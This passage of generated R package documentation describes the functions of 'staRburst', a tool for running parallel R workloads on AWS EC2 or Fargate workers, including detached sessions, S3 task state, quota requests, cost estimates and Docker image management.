\item{session_id}{Session identifier}

\item{updates}{Named list of fields to update}

\item{region}{AWS region}

\item{bucket}{S3 bucket}

\item{max_retries}{Maximum number of retry attempts (default: 3)}
}
\value{
Invisibly returns updated manifest
}
\description{
Uses S3 ETags for optimistic locking to prevent race conditions.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{poll_for_result}
\alias{poll_for_result}
\title{Poll for result}
\usage{
poll_for_result(future, timeout = 3600)
}
\description{
Poll for result
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_is_configured}
\alias{starburst_is_configured}
\title{Check if staRburst is configured}
\usage{
starburst_is_configured()
}
\value{
\code{TRUE} if configured and credentials are available, \code{FALSE} otherwise.
}
\description{
Returns \code{TRUE} if \code{starburst_setup()} has been run, the
configuration file exists, and AWS credentials are available.
Useful for guarding example code that requires AWS credentials.
}
\examples{
starburst_is_configured()
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_status}
\alias{starburst_status}
\title{Show staRburst status}
\usage{
starburst_status()
}
\value{
Invisibly returns a list with current configuration and quota information.
}
\description{
Show staRburst status
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{StarburstFuture}
\alias{StarburstFuture}
\title{StarburstFuture Constructor}
\usage{
StarburstFuture(
  expr,
  envir = parent.frame(),
  substitute = TRUE,
  globals = TRUE,
  packages = NULL,
  lazy = FALSE,
  seed = FALSE,
  stdout = TRUE,
  conditions = "condition",
  label = NULL,
  ...
)
}
\arguments{
\item{expr}{Expression to evaluate}

\item{envir}{Environment for evaluation}

\item{substitute}{Whether to substitute the expression}

\item{globals}{Globals to export (TRUE for auto-detection, list for manual)}

\item{packages}{Packages to load}

\item{lazy}{Whether to lazily evaluate (always FALSE for remote)}

\item{seed}{Random seed}

\item{...}{Additional arguments}
}
\value{
A StarburstFuture object
}
\description{
Creates a Future object for evaluation on AWS workers (EC2 by default, or Fargate)
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plan-starburst.R
\name{plan.starburst}
\alias{plan.starburst}
\title{staRburst Future Backend}
\usage{
\method{plan}{starburst}(
  strategy,
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  auto_quota_request = interactive(),
  launch_type = "EC2",
  instance_type = "c7g.xlarge",
  use_spot = TRUE,
  warm_pool_timeout = 3600,
  detached = FALSE,
  ...
)
}
\arguments{
\item{strategy}{The starburst strategy marker (ignored, for S3 dispatch)}

\item{workers}{Number of parallel workers}

\item{cpu}{vCPUs per worker (1, 2, 4, 8, or 16)}

\item{memory}{Memory per worker (supports GB notation, e.g., "8GB")}

\item{region}{AWS region (default: from config or "us-east-1")}

\item{timeout}{Maximum runtime in seconds (default: 3600)}

\item{auto_quota_request}{Automatically request quota increases (default: interactive())}

\item{launch_type}{Launch type: EC2 or FARGATE (default: EC2)}

\item{instance_type}{EC2 instance type when using EC2 launch type (default: c7g.xlarge)}

\item{use_spot}{Use EC2 Spot instances for cost savings (default: TRUE)}

\item{warm_pool_timeout}{Timeout for warm pool in seconds (default: 3600)}

\item{detached}{Use detached session mode (deprecated, use starburst_session instead)}

\item{...}{Additional arguments passed to future backend}
}
\value{
A future plan object
}
\description{
A future backend for running parallel R workloads on AWS (EC2 or Fargate)
}
\examples{
\donttest{
if (starburst_is_configured()) {
  future::plan(starburst, workers = 50)
  results <- future.apply::future_lapply(1:100, function(i) i^2)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{save_quota_request}
\alias{save_quota_request}
\title{Save quota request to local history}
\usage{
save_quota_request(case_id, service, quota_code, desired_value, region)
}
\description{
Save quota request to local history
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{load_quota_history}
\alias{load_quota_history}
\title{Load quota request history}
\usage{
load_quota_history()
}
\description{
Load quota request history
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{get_task_arn}
\alias{get_task_arn}
\title{Get task ARN}
\usage{
get_task_arn(task_id)
}
\description{
Get task ARN
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{calculate_total_cost}
\alias{calculate_total_cost}
\title{Calculate total cost}
\usage{
calculate_total_cost(plan)
}
\description{
Calculate total cost
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{result_exists}
\alias{result_exists}
\title{Check if result exists}
\usage{
result_exists(task_id, region)
}
\description{
Check if result exists
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{cleanup_session}
\alias{cleanup_session}
\title{Cleanup session}
\usage{
cleanup_session(session, stop_workers = TRUE, force = FALSE)
}
\arguments{
\item{session}{Session object}

\item{stop_workers}{Stop running ECS tasks (default TRUE)}

\item{force}{Delete S3 files (default FALSE)}
}
\description{
Cleanup session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{config_dir}
\alias{config_dir}
\title{Get configuration directory}
\usage{
config_dir()
}
\description{
Get configuration directory
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_setup_ec2}
\alias{starburst_setup_ec2}
\title{Setup EC2 capacity providers for staRburst}
\usage{
starburst_setup_ec2(
  region = "us-east-1",
  instance_types = c("c7g.xlarge", "c7i.xlarge"),
  force = FALSE
)
}
\arguments{
\item{region}{AWS region (default: "us-east-1")}

\item{instance_types}{Character vector of instance types to setup (default: c("c7g.xlarge", "c7i.xlarge"))}

\item{force}{Force re-setup even if already configured}
}
\value{
Invisibly returns \code{TRUE} on success or \code{FALSE} on failure
  or cancellation.
}
\description{
One-time setup for EC2 launch type. Creates IAM roles, instance profiles,
and capacity providers for specified instance types.
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Setup with default instance types (Graviton and Intel)
  starburst_setup_ec2()

  # Setup with custom instance types
  starburst_setup_ec2(instance_types = c("c7g.2xlarge", "r7g.xlarge"))
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{starburst_session_attach}
\alias{starburst_session_attach}
\title{Reattach to Existing Session}
\usage{
starburst_session_attach(session_id, region = NULL)
}
\arguments{
\item{session_id}{Session identifier}

\item{region}{AWS region (default: from config)}
}
\value{
A StarburstSession object
}
\description{
Reattach to a previously created detached session
}
\examples{
\donttest{
if (starburst_is_configured()) {
  session <- starburst_session_attach("session-abc123")
  status <- session$status()
  results <- session$collect()
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{extract_region_from_key}
\alias{extract_region_from_key}
\title{Extract region from S3 key}
\usage{
extract_region_from_key(key)
}
\description{
Extract region from S3 key
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{list_pending_tasks}
\alias{list_pending_tasks}
\title{List pending tasks in session}
\usage{
list_pending_tasks(session_id, region, bucket)
}
\arguments{
\item{session_id}{Session identifier}

\item{region}{AWS region}

\item{bucket}{S3 bucket}
}
\value{
Character vector of pending task IDs
}
\description{
List pending tasks in session
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-retry.R
\name{with_s3_retry}
\alias{with_s3_retry}
\title{Retry S3 operations}
\usage{
with_s3_retry(expr, max_attempts = 3, operation_name = "S3 operation")
}
\arguments{
\item{expr}{Expression to evaluate (AWS API call)}

\item{max_attempts}{Maximum retry attempts (default: 3)}

\item{operation_name}{Optional name for logging (default: "AWS operation")}
}
\description{
Specialized wrapper for S3 operations with S3-specific retry patterns
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{result.StarburstFuture}
\alias{result.StarburstFuture}
\title{Get Result from StarburstFuture}
\usage{
\method{result}{StarburstFuture}(future, ...)
}
\arguments{
\item{future}{A StarburstFuture object}

\item{...}{Additional arguments}
}
\value{
A FutureResult object
}
\description{
Retrieves the result from a resolved future
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{public_base_image_exists}
\alias{public_base_image_exists}
\title{Check if a public base image exists (anonymously)}
\usage{
public_base_image_exists(image_uri)
}
\arguments{
\item{image_uri}{Full public image reference, e.g.
\code{public.ecr.aws/f8g1e7l5/base:r4.6.1}.}
}
\value{
TRUE if the manifest is retrievable, FALSE otherwise.
}
\description{
Public ECR images are world-readable, so we can probe the manifest without
credentials via `docker manifest inspect`. Returns FALSE on any error (Docker
missing, network issue, tag absent) so callers fall back to a private build.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{starburst_cleanup_ecr}
\alias{starburst_cleanup_ecr}
\title{Clean up staRburst ECR images}
\usage{
starburst_cleanup_ecr(force = FALSE, region = NULL)
}
\arguments{
\item{force}{Delete all images immediately, ignoring TTL}

\item{region}{AWS region (default: from config)}
}
\value{
Invisibly returns \code{TRUE} on success or \code{FALSE} if not
  configured.
}
\description{
Manually delete Docker images from ECR to save storage costs.
Images will be rebuilt on next use (adds 3-5 min delay).
}
\examples{
\donttest{
if (starburst_is_configured()) {
  # Delete images past TTL
  starburst_cleanup_ecr()

  # Delete all images immediately (save $0.50/month)
  starburst_cleanup_ecr(force = TRUE)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/s3-io.R
\name{get_starburst_bucket}
\alias{get_starburst_bucket}
\title{Get starburst bucket name}
\usage{
get_starburst_bucket()
}
\value{
S3 bucket name
}
\description{
Get starburst bucket name
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{get_ecs_optimized_ami}
\alias{get_ecs_optimized_ami}
\title{Get ECS-optimized AMI ID for region and architecture}
\usage{
get_ecs_optimized_ami(region, architecture = "X86_64")
}
\arguments{
\item{region}{AWS region}

\item{architecture}{CPU architecture ("X86_64" or "ARM64")}
}
\value{
AMI ID
}
\description{
Get ECS-optimized AMI ID for region and architecture
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{create_starburst_bucket}
\alias{create_starburst_bucket}
\title{Create S3 bucket for staRburst}
\usage{
create_starburst_bucket(bucket_name, region)
}
\description{
Create S3 bucket for staRburst
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{save_config}
\alias{save_config}
\title{Save staRburst configuration}
\usage{
save_config(config)
}
\description{
Save staRburst configuration
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{get_instance_vcpus}
\alias{get_instance_vcpus}
\title{Get vCPU count for instance type}
\usage{
get_instance_vcpus(instance_type)
}
\arguments{
\item{instance_type}{EC2 instance type}
}
\value{
Number of vCPUs
}
\description{
Get vCPU count for instance type
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{session-state}
\alias{session-state}
\title{S3 Session State Management}
\description{
Core S3 operations for managing detached session state
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-map.R
\name{starburst_cluster}
\alias{starburst_cluster}
\title{Create a Starburst Cluster}
\usage{
starburst_cluster(
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  launch_type = "EC2",
  instance_type = "c7g.xlarge",
  use_spot = TRUE
)
}
\arguments{
\item{workers}{Number of parallel workers}

\item{cpu}{CPU units per worker}

\item{memory}{Memory per worker}

\item{region}{AWS region}

\item{timeout}{Maximum runtime in seconds}

\item{launch_type}{Compute backend: "EC2" (default) or "FARGATE"}

\item{instance_type}{EC2 instance type when \code{launch_type = "EC2"}
(default: "c7g.xlarge"). Worker CPU architecture follows the instance type
(Graviton \code{*g.*} = ARM64, Intel/AMD = x86_64); there is no separate
platform argument.}

\item{use_spot}{Use EC2 Spot instances for cost savings (default: TRUE)}
}
\value{
A starburst_cluster object
}
\description{
Creates a cluster object for managing AWS workers (EC2 by default, or Fargate)
using the staRburst Future backend.
}
\examples{
\donttest{
if (starburst_is_configured()) {
  cluster <- starburst_cluster(workers = 20)
  results <- cluster$map(data, function(x) x * 2)

  # Fargate backend instead of the EC2 default
  fg <- starburst_cluster(workers = 20, launch_type = "FARGATE")
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{create_ecs_cluster}
\alias{create_ecs_cluster}
\title{Create ECS cluster}
\usage{
create_ecs_cluster(cluster_name, region)
}
\description{
Create ECS cluster
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-estimate.R
\name{print_estimate_summary}
\alias{print_estimate_summary}
\title{Print Estimate Summary}
\usage{
print_estimate_summary(pred, local_specs)
}
\description{
Print Estimate Summary
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-estimate.R
\name{get_local_hardware_specs}
\alias{get_local_hardware_specs}
\title{Get Local Hardware Specifications}
\usage{
get_local_hardware_specs()
}
\value{
List with cpu_name, cores, and architecture
}
\description{
Detects local CPU model and core count for performance estimation.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{session-api}
\alias{session-api}
\title{Detached Session API}
\description{
User-facing API for creating and managing detached sessions
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{get_ec2_instance_price}
\alias{get_ec2_instance_price}
\title{Get EC2 instance pricing (live, cached, with static fallback)}
\usage{
get_ec2_instance_price(instance_type, use_spot = FALSE, region = NULL)
}
\arguments{
\item{instance_type}{EC2 instance type (e.g., "c7g.xlarge")}

\item{use_spot}{Whether to use spot pricing}

\item{region}{AWS region (default: from config or "us-east-1")}
}
\value{
Price per hour in USD
}
\description{
Looks up the current AWS price for an instance type. On-Demand rates come from
the AWS Pricing API and Spot rates from EC2 spot-price history; both are cached
per session. Any failure (offline, missing perms, unknown type) falls back to a
built-in static rate, so cost estimates always return a number.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/cost.R
\name{calculate_task_cost}
\alias{calculate_task_cost}
\title{Calculate task cost}
\usage{
calculate_task_cost(future)
}
\description{
Calculate task cost
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plan-starburst.R
\name{register_cleanup}
\alias{register_cleanup}
\title{Register cleanup handler}
\usage{
register_cleanup(evaluator)
}
\description{
Register cleanup handler
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-clients.R
\name{get_s3_client}
\alias{get_s3_client}
\title{Get S3 client}
\usage{
get_s3_client(region)
}
\arguments{
\item{region}{AWS region}
}
\value{
S3 client
}
\description{
Get S3 client
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-estimate.R
\name{calculate_predictions}
\alias{calculate_predictions}
\title{Calculate Cloud Performance Predictions}
\usage{
calculate_predictions(
  n_total,
  avg_time_per_task,
  local_specs,
  workers,
  cpu,
  memory,
  platform
)
}
\description{
Calculate Cloud Performance Predictions
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-clients.R
\name{check_aws_credentials}
\alias{check_aws_credentials}
\title{Check AWS credentials}
\usage{
check_aws_credentials()
}
\value{
Logical indicating if credentials are valid
}
\description{
Check AWS credentials
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-backend.R
\name{launch_detached_workers}
\alias{launch_detached_workers}
\title{Launch workers for detached session}
\usage{
launch_detached_workers(backend)
}
\arguments{
\item{backend}{Backend environment}
}
\value{
Invisibly returns NULL
}
\description{
Launches workers with bootstrap tasks that tell them the session ID
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{get_architecture_from_instance_type}
\alias{get_architecture_from_instance_type}
\title{Get CPU architecture from instance type}
\usage{
get_architecture_from_instance_type(instance_type)
}
\arguments{
\item{instance_type}{EC2 instance type (e.g., "c7g.xlarge", "c7i.xlarge", "c7a.xlarge")}
}
\value{
CPU architecture ("ARM64" or "X86_64")
}
\description{
Get CPU architecture from instance type
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-state.R
\name{update_task_status}
\alias{update_task_status}
\title{Update task status with atomic write}
\usage{
update_task_status(
  session_id,
  task_id,
  state,
  etag = NULL,
  region,
  bucket,
  updates = list()
)
}
\arguments{
\item{session_id}{Session identifier}

\item{task_id}{Task identifier}

\item{state}{New state}

\item{etag}{Optional ETag for conditional write (atomic claiming)}

\item{region}{AWS region}

\item{bucket}{S3 bucket}

\item{updates}{Optional additional fields to update}
}
\value{
TRUE if successful, FALSE if conditional write failed
}
\description{
Update task status with atomic write
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{compute_env_hash}
\alias{compute_env_hash}
\title{Compute environment image hash}
\usage{
compute_env_hash(lock_file)
}
\arguments{
\item{lock_file}{Path to renv.lock file}
}
\value{
MD5 hash string
}
\description{
Computes the hash used to tag environment Docker images, combining the
renv.lock file contents with the starburst package version. This ensures
new images are built when either the R package environment or the starburst
worker script changes.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-definition.R
\name{get_execution_role_arn}
\alias{get_execution_role_arn}
\title{Get IAM execution role ARN}
\usage{
get_execution_role_arn(region)
}
\description{
Returns the ARN for the ECS execution role (should be created during setup)
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{get_starburst_config}
\alias{get_starburst_config}
\title{Get staRburst configuration}
\usage{
get_starburst_config()
}
\value{
List of configuration values
}
\description{
Get staRburst configuration
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{safe_system}
\alias{safe_system}
\title{Execute system command safely (no shell injection)}
\usage{
safe_system(
  command,
  args = character(),
  allowed_commands = c("docker", "aws", "uname", "sysctl", "cat", "nproc"),
  stdin = NULL,
  stdout = "|",
  stderr = "|",
  ...
)
}
\arguments{
\item{command}{Command to execute (must be in whitelist)}

\item{args}{Character vector of arguments}

\item{allowed_commands}{Commands allowed to be executed}

\item{stdin}{Optional input to pass to stdin}

\item{...}{Additional arguments passed to processx::run()}
}
\value{
Result from processx::run()
}
\description{
Execute system command safely (no shell injection)
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/aws-retry.R
\name{with_aws_retry}
\alias{with_aws_retry}
\title{Retry AWS operations with exponential backoff}
\usage{
with_aws_retry(
  expr,
  max_attempts = 3,
  base_delay = 1,
  max_delay = 60,
  retryable_errors = c("Throttling", "ThrottlingException", "RequestTimeout",
    "ServiceUnavailable", "InternalError", "InternalServerError", "TooManyRequests",
    "RequestLimitExceeded", "5\\\\d{2}"),
  operation_name = "AWS operation"
)
}
\arguments{
\item{expr}{Expression to evaluate (AWS API call)}

\item{max_attempts}{Maximum retry attempts (default: 3)}

\item{base_delay}{Initial delay in seconds (default: 1)}

\item{max_delay}{Maximum delay in seconds (default: 60)}

\item{retryable_errors}{Regex patterns for retryable error messages}

\item{operation_name}{Optional name for logging (default: "AWS operation")}
}
\value{
Result of expression
}
\description{
Wraps AWS API calls with automatic retry logic for transient failures.
Uses exponential backoff with jitter to avoid thundering herd.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{create_ecr_lifecycle_policy}
\alias{create_ecr_lifecycle_policy}
\title{Create ECR lifecycle policy to auto-delete old images}
\usage{
create_ecr_lifecycle_policy(region, repository_name, ttl_days = NULL)
}
\arguments{
\item{region}{AWS region}

\item{repository_name}{ECR repository name}

\item{ttl_days}{Number of days to keep images (NULL = no auto-delete)}
}
\description{
Create ECR lifecycle policy to auto-delete old images
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{config_path}
\alias{config_path}
\title{Get configuration file path}
\usage{
config_path()
}
\description{
Get configuration file path
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{get_current_vcpu_usage}
\alias{get_current_vcpu_usage}
\title{Get current vCPU usage}
\usage{
get_current_vcpu_usage(region)
}
\description{
Get current vCPU usage
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{create_session_object}
\alias{create_session_object}
\title{Create session object with methods}
\usage{
create_session_object(backend)
}
\arguments{
\item{backend}{Backend environment}
}
\value{
Session object (environment)
}
\description{
Create session object with methods
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ec2-pool.R
\name{stop_warm_pool}
\alias{stop_warm_pool}
\title{Stop warm pool}
\usage{
stop_warm_pool(backend)
}
\arguments{
\item{backend}{Backend configuration object}
}
\value{
Invisible NULL
}
\description{
Scales Auto-Scaling Group to zero
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/future-starburst.R
\name{resolved.StarburstFuture}
\alias{resolved.StarburstFuture}
\title{Check if StarburstFuture is Resolved}
\usage{
\method{resolved}{StarburstFuture}(x, ...)
}
\arguments{
\item{x}{A StarburstFuture object}

\item{...}{Additional arguments}
}
\value{
Logical indicating if the future is resolved
}
\description{
Checks whether the future task has completed execution
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{starburst_list_sessions}
\alias{starburst_list_sessions}
\title{List All Sessions}
\usage{
starburst_list_sessions(region = NULL)
}
\arguments{
\item{region}{AWS region (default: from config)}
}
\value{
Data frame with session information
}
\description{
List all detached sessions in S3
}
\examples{
\donttest{
if (starburst_is_configured()) {
  sessions <- starburst_list_sessions()
  print(sessions)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/starburst-package.R
\docType{package}
\name{starburst-package}
\alias{starburst-package}
\title{starburst: Seamless AWS Cloud Bursting for Parallel R Workloads}
\description{
\if{html}{\figure{logo.png}{options: style='float: right' alt='logo' width='120'}}

A 'future' backend that enables seamless execution of parallel R workloads on 'Amazon Web Services' ('AWS', \url{https://aws.amazon.com}), including 'EC2' and 'Fargate'. 'staRburst' handles environment synchronization, data transfer, quota management, and worker orchestration automatically, allowing users to scale from local execution to 100+ cloud workers with a single line of code change.
}
\seealso{
Useful links:
\itemize{
  \item \url{https://starburst.ing}
  \item \url{https://github.com/scttfrdmn/starburst}
  \item Report bugs at \url{https://github.com/scttfrdmn/starburst/issues}
}

}
\author{
\strong{Maintainer}: Scott Friedman \email{help@starburst.ing}

Authors:
\itemize{
  \item Scott Friedman \email{help@starburst.ing}
}

}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{setup_vpc_resources}
\alias{setup_vpc_resources}
\title{Setup VPC resources}
\usage{
setup_vpc_resources(region)
}
\description{
Setup VPC resources
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/StarburstBackend-class.R
\name{launchFuture.StarburstBackend}
\alias{launchFuture.StarburstBackend}
\title{Launch a future on the Starburst backend}
\usage{
\method{launchFuture}{StarburstBackend}(backend, future, ...)
}
\arguments{
\item{backend}{A StarburstBackend object}

\item{future}{The future object to launch}

\item{...}{Additional arguments}
}
\value{
The future object (invisibly)
}
\description{
Launch a future on the Starburst backend
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/setup.R
\name{is_setup_complete}
\alias{is_setup_complete}
\title{Check if setup is complete}
\usage{
is_setup_complete()
}
\description{
Check if setup is complete
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{starburst_session}
\alias{starburst_session}
\title{Create a Detached Starburst Session}
\usage{
starburst_session(
  workers = 10,
  cpu = 4,
  memory = "8GB",
  region = NULL,
  timeout = 3600,
  session_timeout = 3600,
  absolute_timeout = 86400,
  launch_type = "EC2",
  instance_type = "c7g.xlarge",
  use_spot = TRUE,
  warm_pool_timeout = 3600
)
}
\arguments{
\item{workers}{Number of parallel workers (default: 10)}

\item{cpu}{vCPUs per worker (default: 4)}

\item{memory}{Memory per worker, e.g., "8GB" (default: "8GB")}

\item{region}{AWS region (default: from config or "us-east-1")}

\item{timeout}{Task timeout in seconds (default: 3600)}

\item{session_timeout}{Active timeout in seconds (default: 3600)}

\item{absolute_timeout}{Maximum session lifetime in seconds (default: 86400)}

\item{launch_type}{"EC2" or "FARGATE" (default: "EC2")}

\item{instance_type}{EC2 instance type for EC2 launch (default: "c7g.xlarge")}

\item{use_spot}{Use spot instances for EC2 (default: TRUE)}

\item{warm_pool_timeout}{EC2 warm pool timeout in seconds (default: 3600)}
}
\value{
A \code{StarburstSession} object (also carrying \code{$session_id}, the
  handle you pass to \code{\link{starburst_session_attach}}) with methods:
  \describe{
    \item{\code{submit(expr, globals = NULL, packages = NULL)}}{Submit one task
      (a quoted expression). Returns the task id. Call repeatedly to fan out work.}
    \item{\code{status()}}{Return a progress summary (counts of pending / running
      / completed / failed tasks). Safe to call from a fresh R session after
      reattaching.}
    \item{\code{collect(wait = FALSE)}}{Retrieve results, keyed by task id, in
      submission order. With \code{wait = FALSE} returns whatever has finished so
      far; \code{wait = TRUE} blocks until every submitted task is terminal.
      Every terminal task appears: a success carries its return value; a
      \strong{failed} task carries a structured failure
      \code{list(error = TRUE, message = ..., value = NULL, task_id = ...)} so
      failures are visible rather than silently dropped.}
    \item{\code{extend(seconds = 3600)}}{Extend the active/absolute timeout of a
      still-running session.}
    \item{\code{cleanup(stop_workers = TRUE, force = FALSE)}}{Stop the session's
      workers and mark it terminated. By default \strong{S3 objects are
      preserved} (so you can still inspect/collect); pass \code{force = TRUE} to
      also delete the session's S3 task/result objects. Otherwise the session
      self-terminates at \code{absolute_timeout}.}
  }
}
\description{
Creates a new detached session that can run computations independently
of your R session. You can close R and reattach later to collect results.
}
\section{Lifecycle}{

\code{starburst_session()} launches workers immediately and returns a handle.
Submit tasks, then either poll \code{status()}/\code{collect()} in the same
session, or record \code{session$session_id}, close R, and later
\code{\link{starburst_session_attach}(session_id)} to reconnect and collect.
A session ends when you call \code{cleanup()}, when \code{session_timeout}
elapses with no activity, or at \code{absolute_timeout} — whichever comes first.
}

\section{Failure behavior}{

A failed task is recorded (surfaced via \code{status()}) and does not abort the
others; \code{collect()} returns it as a structured failure entry
(\code{error = TRUE} with a \code{message}) alongside the successful results,
rather than dropping it or raising. If the client
dies, workers keep running against S3 until a timeout, which is what makes
reattaching possible. \code{cleanup()} is the only thing that frees resources
early — sessions do not auto-clean on garbage collection.
}

\examples{
\donttest{
if (starburst_is_configured()) {
  # Create detached session
  session <- starburst_session(workers = 10)

  # Submit tasks
  task_ids <- lapply(1:100, function(i) {
    session$submit(quote(expensive_computation(i)))
  })

  # Close R and come back later...
  session_id <- session$session_id

  # Reattach
  session <- starburst_session_attach(session_id)

  # Collect results
  results <- session$collect(wait = TRUE)
}
}
}
\seealso{
\code{\link{starburst_session_attach}},
  \code{\link{starburst_list_sessions}}; \code{\link{starburst_map}} for
  ephemeral (non-detached) fan-out.
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{ensure_base_image}
\alias{ensure_base_image}
\title{Ensure base image exists}
\usage{
ensure_base_image(region, use_public = NULL)
}
\arguments{
\item{region}{AWS region}

\item{use_public}{Logical, use public ECR base image (default TRUE)}
}
\description{
Ensure base image exists
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{starburst_request_quota_increase}
\alias{starburst_request_quota_increase}
\title{Request quota increase (user-facing)}
\usage{
starburst_request_quota_increase(vcpus = 500, region = NULL)
}
\arguments{
\item{vcpus}{Desired vCPU quota}

\item{region}{AWS region (default: from config)}
}
\value{
Invisibly returns \code{TRUE} if the increase was requested,
  \code{FALSE} if already sufficient or cancelled.
}
\description{
Request quota increase (user-facing)
}
\examples{
\donttest{
if (starburst_is_configured()) {
  starburst_request_quota_increase(vcpus = 500)
}
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/task-registry.R
\name{list_active_clusters}
\alias{list_active_clusters}
\title{List active clusters}
\usage{
list_active_clusters(region)
}
\description{
List active clusters
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{get_base_image_uri}
\alias{get_base_image_uri}
\title{Get base image URI}
\usage{
get_base_image_uri(region)
}
\description{
Get base image URI
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{check_ecr_image_age}
\alias{check_ecr_image_age}
\title{Check ECR image age and suggest/force rebuild}
\usage{
check_ecr_image_age(region, image_tag, ttl_days = NULL, force_rebuild = FALSE)
}
\arguments{
\item{region}{AWS region}

\item{image_tag}{Image tag to check}

\item{ttl_days}{TTL setting (NULL = no check)}

\item{force_rebuild}{Force rebuild if past TTL}
}
\value{
TRUE if image is fresh or doesn't exist, FALSE if stale
}
\description{
Check ECR image age and suggest/force rebuild
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/session-api.R
\name{get_session_status}
\alias{get_session_status}
\title{Get session status}
\usage{
get_session_status(session)
}
\description{
Get session status
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/images.R
\name{images}
\alias{images}
\title{ECR repositories and Docker environment images for staRburst}
\description{
Functions for building and tracking the worker Docker images stored in ECR,
including the shared base image and per-environment images keyed by a hash
of the project's renv.lock.
}
\keyword{internal}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/quota.R
\name{check_quota_sufficient}
